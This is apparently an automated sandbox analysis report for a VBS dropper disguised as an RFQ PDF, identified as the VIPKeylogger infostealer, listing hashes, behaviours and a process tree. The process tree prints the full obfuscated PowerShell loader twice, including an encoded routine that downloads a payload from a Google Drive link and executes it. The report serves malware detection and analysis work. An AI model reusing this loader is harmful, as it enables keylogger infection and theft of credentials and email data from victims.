Overview

overview

10

Static

static

1

Permintaan...df.vbs

windows7-x64

8

Permintaan...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/11/2024, 06:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs

  • Size

    29KB

  • MD5

    e1e5a3c6c5cba2a431c6c7b970486c1a

  • SHA1

    adb2d67c153f9ffe56315d6eac2de6adcf2c7a87

  • SHA256

    3e3da0990a7a0ec7287bede75ea413d4beb4c0d0dc5fcd04ae37ee1129f6b46d

  • SHA512

    801640e3674bef81f05f9b7b7dd03ac3d4a52a1eec909221240ebe5fec783c3b33001fd217fb1b2e02e0895075cea7f483a0d1b82d189f39a14929bb1b0d606b

  • SSDEEP

    384:Y2kDRQGJuHwVQYFup6OtxODqjdugAbl9GPPfjgZrpd:Y2kDRQGrVQ+8PtEGjdugAaPPfq7

Score
10/10
vipkeyloggercollectiondiscoverykeyloggerstealer

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

    stealerkeyloggervipkeylogger
  • Vipkeylogger family
    vipkeylogger
  • Blocklisted process makes network request 11 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Dealcoholist Nonverticality Pleiochromia Regeneratives deselect #>;$Commandry='Rerent';<#ontologism Lh Dyrekroppernes #>; function Tomandsteltet($Bengtedes){If ($host.DebuggerEnabled) {$Nobie221++;}$Gangbredden=$Pauxi+$Bengtedes.'Length' - $Nobie221; for ( $Skagbos=5;$Skagbos -lt $Gangbredden;$Skagbos+=6){$Sagsbehandlingstiden=$Skagbos;$Jernkrogen+=$Bengtedes[$Skagbos];}$Jernkrogen;}function Organisationsliniers($Bakketop){ . ($Schooper114) ($Bakketop);}$Theanthropic=Tomandsteltet 'UnlabMAfry oNonmazSubwaiScotilQuartlC,ndeaTrinn/C,kla ';$Foredated=Tomandsteltet ' ElekTUnderlKnopps Eneb1 ervi2Vildh ';$Nanoinstruction='Alarm[O ttwNErnriEMeto tLusen.I cissNotheEcag rR Ikl,vr,eaeIC tatCCathaEKirs.pEx itoA.tocITapesN,eoliTUnderMSo oeATakomNKludea B leG SpidE SegrrKorts]Skims:Suppl:HvilksSweepe MillCA lanu dlenr ypopI BartTFondsyUnin,pPhlebr TranO gummt UdpaO endoC nadhoK.mmaL parr=Under$DobbefBaublOS addrAlk he Opb dLa keaShowet ExsuESchooD Brin ';$Theanthropic+=Tomandsteltet 'Ide l5innaw. Audi0 Thur Zymin(GlamoWMetaciAph,dnOphthdReinoo Ka twArgumsHaven Pr eNKind TTopas Klemm1Af en0Finde.Aunts0Enti.;Skist tjekpWBibehiUndern Over6,esan4 Kalk;Trium SchoxEryth6Uduel4Finp ;Mult. Rem pr odonvUnvol:Dyr,h1Copyh3Paa o1unint. rans0Kasse)Faite Brow GU,mereAreitcRetinkLouisoF act/Grant2 Barb0 Punc1 We s0Antim0Liats1A.noe0 iber1 Mand GlycaFSkulaiSt,lar,verteAlfabfTch foEc,hyxHydri/Siv i1Showe3Chron1 Pa h.cisel0Scis. ';$Flabellum=Tomandsteltet 'Umisku SkolSSwitcESupprrtrykf-sluffaGermagRadioeMishan.tepdTU.der ';$Chanelled=Tomandsteltet 'I hyph Simbt se vtMedicpUninds agab:Afgan/Torde/recondKul yrHo,eviKredsvSkibsesneen.lethagMetrioPecksoC alugVildflPe.ebe Morg.Tred cMetamoTandrmhoved/RolleuPouchcBowra?Overle ordex RetspUdsaloChetar Z ratTr ch= algsdOm,tro EftewOmposn Dac lCra.ioFotokaA onodCocai&Gluggi .utpd Resf=Hov d1U,mol4Op ranMisrelTrampW keenJOpstihPompa9SjaskQFlageyUngdousta iaTheomC ntirpSvampCbusteFOmgn.oTeks,ds junOtroskbRenegIAtropPTa,elv SimeRTryglmVi.ceFscutiE Hyp.aSmigeg nobBBespr4Sili 0CunablBelg ';$Skagbosrian=Tomandsteltet 'Fluti>Tarif ';$Schooper114=Tomandsteltet ' Yatti SnakeUdma X E zy ';$Rkenvinden='Sendebuddene';$Destool='\Kammeratskabers.Bad';Organisationsliniers (Tomandsteltet 'Cafvw$V,spegudstolFjerlo ScopbS tueAOcc ll Cor :BrandCS ovfH ivr aSoil.RKimmeLUntruE Agn,SMudstt B reoNaermN,roade Cower UndeSPla i7Sa va5Skjor=Hailp$ EchiEMiscoNGalliV T eb:SuperaAdminPSycopPBruttdExarcA SovetGanglaFoo f+Skor $ uns dmatriE CorpsTolketSkismOHexa.OSuppeLKolon ');Organisationsliniers (Tomandsteltet ' shoa$VelkogC adoLSot.eo Gat bDigitanonmulConcu: co wbRda.go soeATeglvs B ertHa,skePrs mrRejud=Persi$C ampcSterlHVe.eeaSubtrnSkurvEKonv,LEnucllglaureAntikDEtaer.ExpreSChan PkabellDat tIScenatLigka(Tonls$EndehSIndviKAsbesayokelG Sub bLage OneuccSLibetRDu,piIBloktaGeodinDrklo)Nepot ');Organisationsliniers (Tomandsteltet $Nanoinstruction);$Chanelled=$Boaster[0];$Ballademagernes=(Tomandsteltet 'Retou$S,lreGAcriflTaareO tateb WoodABeklulnonco:CalamOAnto,UNakedt CatcpHieroo QuadROverrTIndkoe .steR Conf=oppreNDlestEIll.mWTeate- TheroUnd rbB,rdbJ apetEJaegeCSeriet,opou ErklrsM jenyDehumSPe letdrejeEOk.ulMMaced.UndulN Tnkee PharTUn.oc.SolitwAal dE FeltbTympaCBankdL UndeIConceE Dokun ccipTDavid ');Organisationsliniers ($Ballademagernes);Organisationsliniers (Tomandsteltet 'Revis$SprinODenjauFu mat Jarlp Uf,roCaligrCirkut atrueOpdatr Hete.Takt,HRula,eU staaForhadUr,the F,agrO fedsPlace[ afhn$ WiviF D oll heltaSinapbSkaale Aut lUnip,lC,llauBiremmAftal]Forld= Skyb$ utqTDispehO.ncreTubulaResifnT.ofttKa tehPa yrrDeleno.obbyp orriiGrnsecbarde ');$Skumlsendes=Tomandsteltet 'Bldtv$FortiOInsaluResymt BombpSubt oklubbr alut Pr beYdmygrfa,il.penetDPr cloTap,vw Waasn,udiolbetago ogsaElfendregerFSenteiEvolulransaeForfa(Sabel$NaumaCBremshDileta Knapn ,nsteSyndel KbsmlFore,ePentodCohes,Noon $E.ercEPrin aVenomr Ti ksDrukthMayfl)Entab ';$Earsh=$Charlestoners75;Organisationsliniers (Tomandsteltet 'Trenc$UigenG.itraLSeis odemarBMascuA RoveLCount:CustonSolutiRundsaStartA ridorLokalS Brne=Efter( Sk lTspeciEForres GeneTAfrik-Conf pT eorAInterTStereHWh ti immov$KickseErhveaAlterr ReclSCatl h Ove )Inn.r ');while (!$Niaars) {Organisationsliniers (Tomandsteltet 'Bdest$ UnstgSmrinlG ggeoLaaneb Fiska sselLitho: Sa,rF E del bilouphenyoSk jer Mis oP rlemIs,pieS ortttremurSnderiStrenc for =Fagpe$ ,ambtJannir rskruTa,liemeta ') ;Organisationsliniers $Skumlsendes;Organisationsliniers (Tomandsteltet 'Stills SpekTBortoA BeraRO eanTMisgr-Kveyes UnvolD nteeAftjeenordbp.opdr Selva4Safec ');Organisationsliniers (Tomandsteltet 'Skrmb$ TranGOutteLIndi OBlot b Rem AReapolCurtn:Run.sNDeltiI C aiAkonceA Rus,RSke,eSPr fe= Ma.t(Tse rt oundEBifurSL.biatdrago-Unp,lPC.penAOffe.T PantH Unex skrte$KnivaE ccusaOmfavR valS.obleH Ryat)Hydro ') ;Organisationsliniers (Tomandsteltet ' Hung$GifteGformeLRestioInvidbRyggeABemrkLPtych:DoriefoversRFu leI CaratPrin n egatk LysiedksdrRIsotoSRi goKBlak.EMnstrRIntroNB eepE ymboS even=Blovs$.taklGModerlstoryoResocbAzo oAKoggeLUford:RetouSLev,dPbioteoAsminNatraidInexte De kRombytNCanceEearnes Knyt+Tekst+Bankf%Crios$S alobDes xoSttenAB,rmfSIndsptWema,eDr.inrLoang.Dorthc UdbaO dsluuSlagsnOv,ritVandv ') ;$Chanelled=$Boaster[$Fritnkerskernes];}$Kaldsekvensernes=315496;$Ekspertens=31037;Organisationsliniers (Tomandsteltet 'Bor v$HoldaGSkjollGuldmO ForobLiquoaBughuLforst:Tohold BitcA OverCAn arRBelieYBe kfDRy kliVan.luVandkmPerti Amphi=Trans RipogOutb eIsoaltFalsn-M,nitcNonsuo euronTestpt AktieMesobN xtraTSkift Netto$PrecoEFilmfaPuntarKrigsSUnderH onli ');Organisationsliniers (Tomandsteltet ' Un.f$nulpugBravelStaitoAdoptb SondaAstralTetra:SophiESlo an andfcsteigiFaktupUn.omhSpueseI parrTople Afret= He.e Stenu[Li sfSAvickyFlag,sTil rt EfteeT quimbrats.AlispCBedemoChimln polivUnstieTentarHe git.unkt]Opsli:Unret:SynchFHasterKonvooPantamBltesBO phiaMorals Mil eMen.n6Annuu4SysteS Flelt femtr TobaiCaseanOversg Renu(Numme$ Bo tD exana gibbcCellbrFetisyS aaldObvoliBiletuPorcemAfhug)Di tr ');Organisationsliniers (Tomandsteltet '.iske$MoralgPlatfL oftsoSalgsbPeneta RetrlLongw:Vict.sdeadlH LansA kbenMkanyloPastrSzoocu None= Kev, pasm[Sa.cosS atsYBistaSM chaTRen.eE,athfMDisci.Ac ntT AmpheKaskeXDichltGu.ro.Zou veklyngN Cranc JacoODin ldRestaiFr rsn,illegFrake]Fo,si:R,tih: s iraud.pesFloppCBipoliEncepiMejsl.E ptyg F,eleAlk,ltForsksFrihetHatchr AksiIParaen FavogS,anl(yderd$CorsaeA tigNEa,coC TotaiDuksePKantahT.leveRes.rrBrnet)Repr. ');Organisationsliniers (Tomandsteltet ' Subs$LnforGUn spLPaas OPrecoBUnd,raPr ncLUnzo :Un its GrotAgi,geLP venpDissyEExsupTLiderEvarioR Millh Curso Plasl StttDLuntii Canag andesCova,tParane PurksEmira=Samme$AdoraSBrndeh amboAHewgamCunjeOFolk.sSkaf .SambhsIdeoku SemiBFaxensHushoTBr ndROsendIUnre.nEmbraGMas i(tvivl$DykkeK Dysta SminL EnerDHav,nsEkstrETuttskHyssevKarole BrugNGenopSA tioEknortRCol,onElectESilo SJibes,Sita,$fun eeA imek KlagsReplePKrngneUn,avRDeco,tDemo eEr.riNTrodsSFri k)Reste ');Organisationsliniers $Salpeterholdigstes;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2660
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Dealcoholist Nonverticality Pleiochromia Regeneratives deselect #>;$Commandry='Rerent';<#ontologism Lh Dyrekroppernes #>; function Tomandsteltet($Bengtedes){If ($host.DebuggerEnabled) {$Nobie221++;}$Gangbredden=$Pauxi+$Bengtedes.'Length' - $Nobie221; for ( $Skagbos=5;$Skagbos -lt $Gangbredden;$Skagbos+=6){$Sagsbehandlingstiden=$Skagbos;$Jernkrogen+=$Bengtedes[$Skagbos];}$Jernkrogen;}function Organisationsliniers($Bakketop){ . ($Schooper114) ($Bakketop);}$Theanthropic=Tomandsteltet 'UnlabMAfry oNonmazSubwaiScotilQuartlC,ndeaTrinn/C,kla ';$Foredated=Tomandsteltet ' ElekTUnderlKnopps Eneb1 ervi2Vildh ';$Nanoinstruction='Alarm[O ttwNErnriEMeto tLusen.I cissNotheEcag rR Ikl,vr,eaeIC tatCCathaEKirs.pEx itoA.tocITapesN,eoliTUnderMSo oeATakomNKludea B leG SpidE SegrrKorts]Skims:Suppl:HvilksSweepe MillCA lanu dlenr ypopI BartTFondsyUnin,pPhlebr TranO gummt UdpaO endoC nadhoK.mmaL parr=Under$DobbefBaublOS addrAlk he Opb dLa keaShowet ExsuESchooD Brin ';$Theanthropic+=Tomandsteltet 'Ide l5innaw. Audi0 Thur Zymin(GlamoWMetaciAph,dnOphthdReinoo Ka twArgumsHaven Pr eNKind TTopas Klemm1Af en0Finde.Aunts0Enti.;Skist tjekpWBibehiUndern Over6,esan4 Kalk;Trium SchoxEryth6Uduel4Finp ;Mult. Rem pr odonvUnvol:Dyr,h1Copyh3Paa o1unint. rans0Kasse)Faite Brow GU,mereAreitcRetinkLouisoF act/Grant2 Barb0 Punc1 We s0Antim0Liats1A.noe0 iber1 Mand GlycaFSkulaiSt,lar,verteAlfabfTch foEc,hyxHydri/Siv i1Showe3Chron1 Pa h.cisel0Scis. ';$Flabellum=Tomandsteltet 'Umisku SkolSSwitcESupprrtrykf-sluffaGermagRadioeMishan.tepdTU.der ';$Chanelled=Tomandsteltet 'I hyph Simbt se vtMedicpUninds agab:Afgan/Torde/recondKul yrHo,eviKredsvSkibsesneen.lethagMetrioPecksoC alugVildflPe.ebe Morg.Tred cMetamoTandrmhoved/RolleuPouchcBowra?Overle ordex RetspUdsaloChetar Z ratTr ch= algsdOm,tro EftewOmposn Dac lCra.ioFotokaA onodCocai&Gluggi .utpd Resf=Hov d1U,mol4Op ranMisrelTrampW keenJOpstihPompa9SjaskQFlageyUngdousta iaTheomC ntirpSvampCbusteFOmgn.oTeks,ds junOtroskbRenegIAtropPTa,elv SimeRTryglmVi.ceFscutiE Hyp.aSmigeg nobBBespr4Sili 0CunablBelg ';$Skagbosrian=Tomandsteltet 'Fluti>Tarif ';$Schooper114=Tomandsteltet ' Yatti SnakeUdma X E zy ';$Rkenvinden='Sendebuddene';$Destool='\Kammeratskabers.Bad';Organisationsliniers (Tomandsteltet 'Cafvw$V,spegudstolFjerlo ScopbS tueAOcc ll Cor :BrandCS ovfH ivr aSoil.RKimmeLUntruE Agn,SMudstt B reoNaermN,roade Cower UndeSPla i7Sa va5Skjor=Hailp$ EchiEMiscoNGalliV T eb:SuperaAdminPSycopPBruttdExarcA SovetGanglaFoo f+Skor $ uns dmatriE CorpsTolketSkismOHexa.OSuppeLKolon ');Organisationsliniers (Tomandsteltet ' shoa$VelkogC adoLSot.eo Gat bDigitanonmulConcu: co wbRda.go soeATeglvs B ertHa,skePrs mrRejud=Persi$C ampcSterlHVe.eeaSubtrnSkurvEKonv,LEnucllglaureAntikDEtaer.ExpreSChan PkabellDat tIScenatLigka(Tonls$EndehSIndviKAsbesayokelG Sub bLage OneuccSLibetRDu,piIBloktaGeodinDrklo)Nepot ');Organisationsliniers (Tomandsteltet $Nanoinstruction);$Chanelled=$Boaster[0];$Ballademagernes=(Tomandsteltet 'Retou$S,lreGAcriflTaareO tateb WoodABeklulnonco:CalamOAnto,UNakedt CatcpHieroo QuadROverrTIndkoe .steR Conf=oppreNDlestEIll.mWTeate- TheroUnd rbB,rdbJ apetEJaegeCSeriet,opou ErklrsM jenyDehumSPe letdrejeEOk.ulMMaced.UndulN Tnkee PharTUn.oc.SolitwAal dE FeltbTympaCBankdL UndeIConceE Dokun ccipTDavid ');Organisationsliniers ($Ballademagernes);Organisationsliniers (Tomandsteltet 'Revis$SprinODenjauFu mat Jarlp Uf,roCaligrCirkut atrueOpdatr Hete.Takt,HRula,eU staaForhadUr,the F,agrO fedsPlace[ afhn$ WiviF D oll heltaSinapbSkaale Aut lUnip,lC,llauBiremmAftal]Forld= Skyb$ utqTDispehO.ncreTubulaResifnT.ofttKa tehPa yrrDeleno.obbyp orriiGrnsecbarde ');$Skumlsendes=Tomandsteltet 'Bldtv$FortiOInsaluResymt BombpSubt oklubbr alut Pr beYdmygrfa,il.penetDPr cloTap,vw Waasn,udiolbetago ogsaElfendregerFSenteiEvolulransaeForfa(Sabel$NaumaCBremshDileta Knapn ,nsteSyndel KbsmlFore,ePentodCohes,Noon $E.ercEPrin aVenomr Ti ksDrukthMayfl)Entab ';$Earsh=$Charlestoners75;Organisationsliniers (Tomandsteltet 'Trenc$UigenG.itraLSeis odemarBMascuA RoveLCount:CustonSolutiRundsaStartA ridorLokalS Brne=Efter( Sk lTspeciEForres GeneTAfrik-Conf pT eorAInterTStereHWh ti immov$KickseErhveaAlterr ReclSCatl h Ove )Inn.r ');while (!$Niaars) {Organisationsliniers (Tomandsteltet 'Bdest$ UnstgSmrinlG ggeoLaaneb Fiska sselLitho: Sa,rF E del bilouphenyoSk jer Mis oP rlemIs,pieS ortttremurSnderiStrenc for =Fagpe$ ,ambtJannir rskruTa,liemeta ') ;Organisationsliniers $Skumlsendes;Organisationsliniers (Tomandsteltet 'Stills SpekTBortoA BeraRO eanTMisgr-Kveyes UnvolD nteeAftjeenordbp.opdr Selva4Safec ');Organisationsliniers (Tomandsteltet 'Skrmb$ TranGOutteLIndi OBlot b Rem AReapolCurtn:Run.sNDeltiI C aiAkonceA Rus,RSke,eSPr fe= Ma.t(Tse rt oundEBifurSL.biatdrago-Unp,lPC.penAOffe.T PantH Unex skrte$KnivaE ccusaOmfavR valS.obleH Ryat)Hydro ') ;Organisationsliniers (Tomandsteltet ' Hung$GifteGformeLRestioInvidbRyggeABemrkLPtych:DoriefoversRFu leI CaratPrin n egatk LysiedksdrRIsotoSRi goKBlak.EMnstrRIntroNB eepE ymboS even=Blovs$.taklGModerlstoryoResocbAzo oAKoggeLUford:RetouSLev,dPbioteoAsminNatraidInexte De kRombytNCanceEearnes Knyt+Tekst+Bankf%Crios$S alobDes xoSttenAB,rmfSIndsptWema,eDr.inrLoang.Dorthc UdbaO dsluuSlagsnOv,ritVandv ') ;$Chanelled=$Boaster[$Fritnkerskernes];}$Kaldsekvensernes=315496;$Ekspertens=31037;Organisationsliniers (Tomandsteltet 'Bor v$HoldaGSkjollGuldmO ForobLiquoaBughuLforst:Tohold BitcA OverCAn arRBelieYBe kfDRy kliVan.luVandkmPerti Amphi=Trans RipogOutb eIsoaltFalsn-M,nitcNonsuo euronTestpt AktieMesobN xtraTSkift Netto$PrecoEFilmfaPuntarKrigsSUnderH onli ');Organisationsliniers (Tomandsteltet ' Un.f$nulpugBravelStaitoAdoptb SondaAstralTetra:SophiESlo an andfcsteigiFaktupUn.omhSpueseI parrTople Afret= He.e Stenu[Li sfSAvickyFlag,sTil rt EfteeT quimbrats.AlispCBedemoChimln polivUnstieTentarHe git.unkt]Opsli:Unret:SynchFHasterKonvooPantamBltesBO phiaMorals Mil eMen.n6Annuu4SysteS Flelt femtr TobaiCaseanOversg Renu(Numme$ Bo tD exana gibbcCellbrFetisyS aaldObvoliBiletuPorcemAfhug)Di tr ');Organisationsliniers (Tomandsteltet '.iske$MoralgPlatfL oftsoSalgsbPeneta RetrlLongw:Vict.sdeadlH LansA kbenMkanyloPastrSzoocu None= Kev, pasm[Sa.cosS atsYBistaSM chaTRen.eE,athfMDisci.Ac ntT AmpheKaskeXDichltGu.ro.Zou veklyngN Cranc JacoODin ldRestaiFr rsn,illegFrake]Fo,si:R,tih: s iraud.pesFloppCBipoliEncepiMejsl.E ptyg F,eleAlk,ltForsksFrihetHatchr AksiIParaen FavogS,anl(yderd$CorsaeA tigNEa,coC TotaiDuksePKantahT.leveRes.rrBrnet)Repr. ');Organisationsliniers (Tomandsteltet ' Subs$LnforGUn spLPaas OPrecoBUnd,raPr ncLUnzo :Un its GrotAgi,geLP venpDissyEExsupTLiderEvarioR Millh Curso Plasl StttDLuntii Canag andesCova,tParane PurksEmira=Samme$AdoraSBrndeh amboAHewgamCunjeOFolk.sSkaf .SambhsIdeoku SemiBFaxensHushoTBr ndROsendIUnre.nEmbraGMas i(tvivl$DykkeK Dysta SminL EnerDHav,nsEkstrETuttskHyssevKarole BrugNGenopSA tioEknortRCol,onElectESilo SJibes,Sita,$fun eeA imek KlagsReplePKrngneUn,avRDeco,tDemo eEr.riNTrodsSFri k)Reste ');Organisationsliniers $Salpeterholdigstes;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:4408

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    71444def27770d9071039d005d0323b7

    SHA1

    cef8654e95495786ac9347494f4417819373427e

    SHA256

    8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

    SHA512

    a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdijf2sh.j3a.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Kammeratskabers.Bad
    Filesize

    451KB

    MD5

    0bfddecbd5e73697b12f8cd627a0828d

    SHA1

    c68400f7844e632fe2b623e4d34365d52a33b478

    SHA256

    6ea06953452dc0a03931e83d22c2e59dece0bebcc8b21f0eb809fa246ea0fe74

    SHA512

    167a02c6fe953fd4029ae4fa19b215fe8c95fd1f62310717d426fd6d89c05edadf1d018cd04c1749a9b02bd90ed84cd668b84f9b2d27a8f97a7996e765bc141c

    Download Submit

  • memory/2660-24-0x00007FF9A1180000-0x00007FF9A1C41000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2660-10-0x000002B3F74D0000-0x000002B3F74F2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2660-19-0x00007FF9A1183000-0x00007FF9A1185000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2660-20-0x00007FF9A1180000-0x00007FF9A1C41000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2660-21-0x00007FF9A1180000-0x00007FF9A1C41000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2660-15-0x00007FF9A1180000-0x00007FF9A1C41000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2660-4-0x00007FF9A1183000-0x00007FF9A1185000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2660-16-0x00007FF9A1180000-0x00007FF9A1C41000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4408-69-0x0000000022380000-0x0000000022412000-memory.dmp

    Filesize

    584KB

    Download

  • memory/4408-66-0x00000000224B0000-0x0000000022672000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/4408-64-0x0000000021820000-0x00000000218BC000-memory.dmp

    Filesize

    624KB

    Download

  • memory/4408-63-0x00000000004B0000-0x00000000004F8000-memory.dmp

    Filesize

    288KB

    Download

  • memory/4408-67-0x0000000021CA0000-0x0000000021CF0000-memory.dmp

    Filesize

    320KB

    Download

  • memory/4408-70-0x0000000022330000-0x000000002233A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4408-62-0x00000000004B0000-0x0000000001704000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4804-41-0x0000000005CC0000-0x0000000005CDE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4804-44-0x0000000006250000-0x000000000626A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4804-45-0x0000000006F40000-0x0000000006FD6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4804-46-0x0000000006ED0000-0x0000000006EF2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4804-47-0x0000000008150000-0x00000000086F4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4804-43-0x0000000007520000-0x0000000007B9A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4804-49-0x0000000008700000-0x000000000A820000-memory.dmp

    Filesize

    33.1MB

    Download

  • memory/4804-42-0x0000000006060000-0x00000000060AC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4804-35-0x00000000055B0000-0x0000000005904000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4804-28-0x0000000004EA0000-0x0000000004F06000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4804-29-0x0000000005540000-0x00000000055A6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4804-27-0x0000000004E00000-0x0000000004E22000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4804-26-0x0000000004F10000-0x0000000005538000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4804-25-0x00000000023B0000-0x00000000023E6000-memory.dmp

    Filesize

    216KB

    Download